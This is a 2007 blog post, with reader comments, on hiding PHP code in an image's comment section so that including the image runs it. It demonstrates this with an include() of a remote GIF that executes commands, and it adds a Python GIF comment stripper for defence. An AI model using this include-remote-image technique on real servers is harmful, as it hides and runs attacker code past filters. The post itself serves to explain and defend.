As reported by the ISC, some people are using images to hide PHP code: if an image contains PHP code, for example in the comment section, it can be included like a usual PHP file, and the PHP code will be happily executed. It may be a great way to hide malicious code on hacked servers and to bypass some IDS/WAF…

Here’s a demo: create a PHP file that includes this innocent image:

<?php
include("http://mdessus.free.fr/Divers/imgwithphpcmd.gif");
?>

Go to the previously created file’s URL, and voilà:

[Image: PHP commands embedded from an image]

June 19, 2007, 4:19 pm
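
The post points at the image comment section as the hiding place. The following is an added example, not code from the original post: a small GIF walker that drops every comment extension block and any bytes after the trailer, and reports the comments that held a PHP open tag. The function names and the 1x1 sample image are constructed for illustration.

```python
import re

# Open tags PHP would act on: "<?php", "<?=", and the short "<?" form.
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.I)

def _sub_blocks(data, i):
    """Read GIF data sub-blocks at i; return (payload, index after the terminator)."""
    out = b""
    while data[i]:
        out += data[i + 1:i + 1 + data[i]]
        i += 1 + data[i]
    return out, i + 1

def _table_len(flags):  # byte length of the colour table announced by a packed-flags byte
    return 3 * 2 ** ((flags & 7) + 1) if flags & 0x80 else 0

def strip_gif_comments(data):
    """Return (gif_without_comments, comments_that_contained_a_php_tag)."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    try:
        i = 13 + _table_len(data[10])          # header + screen descriptor + global table
        out, hits = bytearray(data[:i]), []
        while i < len(data) and data[i] != 0x3B:   # 0x3B = trailer; bytes after it are dropped
            start = i
            if data[i] == 0x21:                # extension: label byte, then sub-blocks
                label = data[i + 1]
                payload, i = _sub_blocks(data, i + 2)
                if label == 0xFE:              # comment extension: never copied to the output
                    if PHP_TAG.search(payload):
                        hits.append(payload)
                    continue
            elif data[i] == 0x2C:              # image descriptor (+ optional local table)
                i += 10 + _table_len(data[i + 9])
                _, i = _sub_blocks(data, i + 1)    # skip LZW code-size byte, read pixel data
            else:
                raise ValueError("unexpected block 0x%02x" % data[i])
            out += data[start:i]
    except IndexError:
        raise ValueError("truncated GIF") from None
    return bytes(out) + b"\x3b", hits

# Constructed sample: 1x1 GIF whose comment block holds a harmless PHP tag.
COMMENT = b"<?php /* constructed marker */ ?>"
IMAGE = b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x4c\x01\x00"
HEAD = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
SAMPLE = HEAD + b"\x21\xfe" + bytes([len(COMMENT)]) + COMMENT + b"\x00" + IMAGE + b"\x3b"
```

This only covers the comment block and trailing bytes of a GIF; the same bytes can sit in other parts of a file, so uploaded files should never be reachable by `include` or `require` in the first place.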


Currently 4 comments

  1. Comment by Mathieu Dessus

    Have a look at the allow_url_include directive: if people are not allowed to upload files on the server this will prevent remote file inclusion.

  2. Comment by Andrei

    How can developers get rid of these scripts inside of uploaded images?

  3. Comment by Mathieu Dessus

    Just open an image with your favorite image editor, and find where you can add a comment. In Gimp, select Image > Image properties.

  4. Comment by AccesInterzis

    Can you show how PHP code can be added into an image?
